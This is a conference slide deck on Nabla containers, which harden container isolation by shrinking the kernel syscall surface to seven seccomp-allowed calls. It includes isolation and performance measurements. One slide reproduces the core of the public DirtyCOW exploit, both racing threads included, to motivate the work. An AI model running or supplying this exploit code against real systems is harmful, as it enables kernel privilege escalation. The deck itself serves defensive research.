KubeCon China 2018

Nabla containers: a new approach to container isolation
Brandon Lum, Ricardo Koller, Dan Williams, Sahil Suneja
IBM Research
https://nabla-containers.github.io

Containers are not securely isolated

- What exactly does this mean?

- Why are VMs considered secure but not containers?

- How do we improve container isolation?

Overview

• Threat Model: Isolation
• Isolation through surface reduction
• Our approach: Nabla
• Measuring Isolation
• Nabla vs VMs?

What does it mean to be isolated?

• Co-located containers should not be able to access the data of another container

• Scenarios:
  • Horizontal attacks from vulnerable services
  • Container-native multi-tenant cloud

[Diagram: attacker container next to Service A (holding a secret) on a shared kernel]

Container Isolation Reality

• Containers == namespaced processes → kernel exploits mostly work
  • Sep 2018: CVE-2018-14634
  • DirtyCOW (CVE-2016-5195)
  • Many more (CVE database); in 2018: code execution (3), memory corruption (8)

[Diagram: attacker container exploiting the shared kernel via syscalls to reach Service A's secret]

• Horizontal attack possible via shared privileged component (kernel)

DirtyCOW

• DirtyCOW exploit sketch (code from https://dirtycow.ninja/):

• mmap a page read-only and MAP_PRIVATE
• Create a thread that invokes madvise
• Create a thread that reads/writes the mapping via procfs (/proc/self/mem)
• Triggers a race condition in kernel memory-management code

    // FROM: https://dirtycow.ninja/
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
    printf("mmap %zx\n\n", (uintptr_t) map);
    /* You have to do it on two threads. */
    pthread_create(&pth1, NULL, madviseThread, argv[1]);     // madvise
    pthread_create(&pth2, NULL, procselfmemThread, argv[2]); // R/W procfs
    /* You have to wait for the threads to finish. */
    pthread_join(pth1, NULL);
    pthread_join(pth2, NULL);
    return 0;
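For completeness, a minimal sketch of the two racing threads, adapted from the public dirtycow.ninja PoC (loop counts and names follow that PoC; this is an illustration, not the authors' code):

    /* Adapted from the public dirtycow.ninja PoC; illustrative sketch only. */
    #include <fcntl.h>
    #include <stdint.h>
    #include <string.h>
    #include <sys/mman.h>
    #include <unistd.h>

    void *map;   /* the read-only, MAP_PRIVATE mapping created in main() */

    /* Thread 1: repeatedly discards the private copy of the page, forcing the
     * kernel to re-fault it while the other thread is mid-write. */
    void *madviseThread(void *arg)
    {
        for (int i = 0; i < 100000000; i++)
            madvise(map, 100, MADV_DONTNEED);
        return NULL;
    }

    /* Thread 2: writes attacker-controlled data through /proc/self/mem into the
     * private mapping; racing with MADV_DONTNEED, a vulnerable kernel ends up
     * committing the write to the underlying read-only file. */
    void *procselfmemThread(void *arg)
    {
        char *str = arg;
        int f = open("/proc/self/mem", O_RDWR);
        for (int i = 0; i < 100000000; i++) {
            lseek(f, (uintptr_t) map, SEEK_SET);
            write(f, str, strlen(str));
        }
        return NULL;
    }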

Container Isolation Reality

[Diagram: attacker container exploiting the shared kernel to reach Service A's secret]

Kernel Footprint

• Exploits target vulnerable parts of the kernel via syscalls (>300 of them)
• If we restrict the number of syscalls:
  • → fewer reachable kernel functions
  • → fewer potential vulnerabilities
  • → fewer possible exploits

[Diagram: application reaching the kernel (FS, disk) through the full >300-syscall interface]

Docker Default Policy

• Docker's default seccomp policy (a whitelisting policy) disables around 44 system calls out of 300+, leaving ~280 allowed
• Generic seccomp policies are hard to create such that they are secure
• Syscall profiling is mostly heuristic-based

[Diagram: application calling into the kernel through seccomp; ~280 syscalls allowed, 44 blocked; greyed boxes are unreachable kernel functions]

Nabla

• Deterministic and generic seccomp policy
• Only 7 syscalls!
• Uses LibOS techniques

[Diagram: application + LibOS shrinking the original 300+ syscall interface* down to 7 syscalls at the seccomp boundary, in front of the kernel (FS, disk)]
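For contrast with the Docker default policy above, here is a minimal sketch (using libseccomp) of what a 7-syscall allowlist looks like. This is an illustration, not the actual nabla tender code; the syscall names come from the hypercall table in the backup slides, and the real tender additionally scopes rules by file-descriptor arguments.

    /* Illustrative sketch only -- not the actual nabla tender implementation.
     * Installs a seccomp allowlist permitting just the seven syscalls the Nabla
     * interface needs (see the hypercall table in the backup slides); anything
     * else kills the process. Build with: -lseccomp */
    #include <seccomp.h>
    #include <stddef.h>

    static const int nabla_allowed[] = {
        SCMP_SYS(read),           /* netread           */
        SCMP_SYS(write),          /* puts / netwrite   */
        SCMP_SYS(ppoll),          /* poll              */
        SCMP_SYS(pread64),        /* blkread           */
        SCMP_SYS(pwrite64),       /* blkwrite          */
        SCMP_SYS(clock_gettime),  /* walltime          */
        SCMP_SYS(exit_group),     /* halt              */
    };

    int install_nabla_like_policy(void)
    {
        /* Default action: kill the process on any syscall not explicitly allowed. */
        scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);
        if (!ctx)
            return -1;

        for (size_t i = 0; i < sizeof(nabla_allowed) / sizeof(nabla_allowed[0]); i++)
            if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, nabla_allowed[i], 0) < 0)
                goto err;

        if (seccomp_load(ctx) < 0)    /* compile and install the BPF filter */
            goto err;

        seccomp_release(ctx);
        return 0;
    err:
        seccomp_release(ctx);
        return -1;
    }

A whitelist this small is only possible because the LibOS has already absorbed the filesystem, network stack, and scheduling work that would otherwise require the wide syscall interface.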

Nabla

• Taking unikernel ideas and putting them into containers

• Using tools/technologies from the rumprun and solo5 communities
• “Unikernels as Processes” (ACM SoCC ’18) (https://dl.acm.org/citation.cfm?id=3267845)

• Modify unikernel to work as a process

Making and running a Nabla

• Build the application with a custom LibOS build process*

[Diagram: build process* turns an application (>300 syscalls) into a Nabla binary with LibOS + seccomp (7 syscalls)]

• The Nabla runtime, runnc, loads the nabla binaries and sets up the seccomp profiles

[Diagram: container runtime (OCI): runc running plain application containers vs runnc running applications with LibOS + 7-syscall seccomp profiles]

*Current limitation of the build process; we are investigating ways to remove the need for a custom build process.

Demo

strace/ftrace measurements (lower is better)

• strace measures the syscalls invoked
• ftrace measures the number of kernel functions ("boxes") touched

[Diagram: application calling into the kernel (>300 syscalls, FS, disk)]

ftrace measurements (lower is better)

[Chart: kernel functions touched, Kata-containers (VMs) vs Nabla]

What does this say about our isolation vs VMs?

Have we surpassed VM isolation?

• We explored and contested this idea in our paper:

“Say Goodbye to Virtualization for a Safer Cloud” (USENIX HotCloud 2018) (https://www.usenix.org/conference/hotcloud18/presentation/williams)

• Maybe… But several questions:
  • Implementation-specific comparisons? KVM vs other hypervisors
  • Hardware-inclusive threat model (Spectre/Meltdown, etc.)
  • Other metrics

What’s Next?

• We want to engage the community:

• Development work for runnc/nabla-base-build/nabla-demo-apps
• Remove the need to rebuild nabla containers (support for dynamically linking the LibOS)
• Create new images and more language support for applications

• Chime in on improving security analysis/metrics
  • https://github.com/nabla-containers/nabla-measurements

Thank You!
https://nabla-containers.github.io

Brandon Lum (@lumjjb) – [email protected]

#NablaContainers

Backup

ftrace measurements (lower is better)

[Diagram: application calling into the kernel (>300 syscalls, FS, disk); measuring the number of kernel functions ("boxes") touched]

Throughput (higher is better)

Demo

[Diagram: Kubelet pulls the image from the image registry (OCI image spec), talks CRI to cri-containerd/containerd, which runs the container via runc or runnc (OCI Runtime Spec); the CNI plugin handles networking; other config (mounts, security, etc.) comes from the podSpec]

Inside a Nabla container

• Unmodified user code (e.g., Node.js, redis, nginx, etc.)
• Rumprun library OS
  • Unmodified NetBSD code (libc, TCP/IP, FS, …) + some glue
  • Runs on the thin Solo5 unikernel interface
• Nabla tender
  • Sets up the seccomp policy
  • Translates Solo5 calls to system calls

[Diagram: original container (application + libc) vs Nabla stack (application, Rumprun/NetBSD + glue, Solo5 interface, tender)]

Backup: Containers vs VMs

Overview

• Threat Model: Isolation
• What makes VMs isolated?
• Nabla: How do we get those isolation properties without overhead?

Disclaimer: In this talk, we are doing a 1:1 comparison. Defense in depth is a valid discussion with a different set of trade-offs.

Containers vs VMs

[Diagram: a compromised process (☠) sitting on the host kernel vs a compromised guest OS (☠) sitting on the hypervisor (+ host kernel (root))]

• Containers: high-level syscall interface (filesystem interface, socket interface, etc.)
• VMs: low-level VT interface (block device interface, TAP interface, etc.)

Containers vs VMs

[Diagram: with containers, the filesystem and disk handling live in the infrastructure below the syscall interface; with VMs, the guest OS contains the filesystem and the infrastructure only exposes a disk below a low-level interface]

• A LOT more exploitable code in the infrastructure!

Lower level interface

Less code

Fewer vulnerabilities

Stronger isolation

Kernel functions accessed by applications

• Compared to standard containers:
  • 5-6x fewer kernel functions accessed
  • 8-14x fewer syscalls
• About half the number of kernel functions accessed as VMs!

[Chart: unique kernel functions accessed by process/container, ukvm/VM, and nabla for nginx, nginx-large, node-express, redis-get, redis-set]

Accessible kernel functions under Nabla policy

• Trinity kernel fuzz tester to try to access as much of the kernel as possible
• The Nabla policy reduces the amount of accessible kernel functions by 98%

[Chart: unique kernel functions reachable per syscall number under an accept-all policy vs the nabla (block) policy]

Unikernel isolation comes from the interface

• Direct mapping between the 10 hypercalls and system call/resource pairs
• 6 for I/O
  • Network: packet level
  • Storage: block level
• vs. >350 syscalls

Hypercall    System call      Resource
walltime     clock_gettime
puts         write            stdout
poll         ppoll            net_fd
blkinfo
blkwrite     pwrite64         blk_fd
blkread      pread64          blk_fd
netinfo
netwrite     write            net_fd
netread      read             net_fd
halt         exit_group
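To illustrate how the mapping stays this small, here is a rough sketch of tender-side hypercall handlers, each reducing to a single system call on a file descriptor the tender opened before applying seccomp. Function and variable names below are made up for illustration, not the real Solo5/nabla API (see https://github.com/solo5/solo5 for the actual code):

    /* Rough sketch of tender-side hypercall handlers; names are hypothetical,
     * not the real Solo5/nabla API. Each handler reduces to one system call on
     * a file descriptor the tender opened before installing the seccomp policy. */
    #include <stdint.h>
    #include <sys/types.h>
    #include <time.h>
    #include <unistd.h>

    static int net_fd;   /* packet-level network fd (e.g. a TAP device), pre-opened */
    static int blk_fd;   /* block-level storage fd (backing file), pre-opened */

    /* netwrite hypercall -> write(net_fd, ...): one packet out */
    static ssize_t hc_netwrite(const void *pkt, size_t len)
    {
        return write(net_fd, pkt, len);
    }

    /* blkread hypercall -> pread64(blk_fd, ...): one block in, at a given offset */
    static ssize_t hc_blkread(void *buf, size_t len, off_t offset)
    {
        return pread(blk_fd, buf, len, offset);   /* pread is pread64 on 64-bit Linux */
    }

    /* walltime hypercall -> clock_gettime */
    static uint64_t hc_walltime(void)
    {
        struct timespec ts;
        clock_gettime(CLOCK_REALTIME, &ts);
        return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
    }

Because every guest operation has to funnel through handlers like these, the set of syscalls (and the fds they may touch) is known before the application runs, which is what makes the seccomp policy both deterministic and generic.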

SoCC

Implementation: nabla

• Extended the Solo5 unikernel ecosystem and ukvm
• Prototype supports:
  • MirageOS
  • IncludeOS
  • Rumprun

• https://github.com/solo5/solo5

Measuring isolation: common applications

• Code reachable through the interface is a metric for attack surface
• Used kernel ftrace
• Results:
  • Processes: 5-6x more unique kernel functions accessed
  • VMs: 2-3x more

[Chart: unique kernel functions accessed by process, ukvm, and nabla for nginx, nginx-large, node-express, redis-get, redis-set]
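As an illustration of this kind of measurement (a sketch of the idea, not the authors' tooling), one can count the unique kernel functions in a dump of the ftrace function tracer, e.g. saved from /sys/kernel/debug/tracing/trace while the workload runs:

    /* Minimal sketch: count unique kernel functions in an ftrace function-tracer
     * dump. Illustrative only -- not the authors' measurement tooling. Assumes
     * the function tracer was enabled and the trace saved to "trace.txt", where
     * each data line ends with "...: <function> <-<caller>". */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define MAX_FUNCS 65536

    static char *funcs[MAX_FUNCS];
    static int nfuncs;

    /* Linear search is slow but fine for a sketch. */
    static int seen(const char *name)
    {
        for (int i = 0; i < nfuncs; i++)
            if (strcmp(funcs[i], name) == 0)
                return 1;
        return 0;
    }

    int main(void)
    {
        FILE *f = fopen("trace.txt", "r");
        char line[1024];

        if (!f) { perror("trace.txt"); return 1; }
        while (fgets(line, sizeof(line), f)) {
            if (line[0] == '#')          /* skip header/comment lines */
                continue;
            char *colon = strrchr(line, ':');   /* last ':' follows the timestamp */
            if (!colon)
                continue;
            char *name = colon + 2;             /* traced function name */
            char *end = strstr(name, " <-");    /* trim the "<-caller" suffix */
            if (!end)
                end = strchr(name, '\n');
            if (!end)
                continue;
            *end = '\0';
            if (!seen(name) && nfuncs < MAX_FUNCS)
                funcs[nfuncs++] = strdup(name);
        }
        printf("unique kernel functions touched: %d\n", nfuncs);
        return 0;
    }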

Measuring isolation: fuzz testing

• Used kernel ftrace
• Used the trinity system call fuzzer to try to access more of the kernel
• Results:
  • The Nabla policy reduces unique kernel functions by 98% over a "normal" process

[Chart: unique kernel functions reachable per syscall number under an accept-all policy vs the nabla (block) policy]

Measuring performance: throughput

• Applications include:
  • Web servers
  • Python benchmarks
  • Redis
  • etc.
• Results:
  • 101%-245% higher throughput than ukvm

[Chart: normalized throughput for ukvm, nabla, and QEMU/KVM across no-I/O and with-I/O workloads: py_tornado, py_chameleon, node_fib, mirage_HTTP, py_2to3, node_express, nginx_large, redis_get, redis_set, includeos_TCP, nginx, includeos_UDP]

Measuring performance: CPU utilization

• vmexits have an effect on instructions per cycle (IPC)
• Experiment with a MirageOS web server
• Results:
  • 12% reduction in CPU utilization over ukvm

[Charts vs. requests/sec: (a) CPU %, (b) VM exits/ms, (c) IPC (instructions/cycle), nabla vs ukvm]

Measuring performance: startup time

• Startup time is important for serverless, NFV
• Results:
  • ukvm has 30-370% higher latency than nabla
  • Mostly due to nabla avoiding KVM overheads

[Charts: hello-world and HTTP POST startup latency vs number of cores for QEMU/KVM, ukvm, nabla, and process]
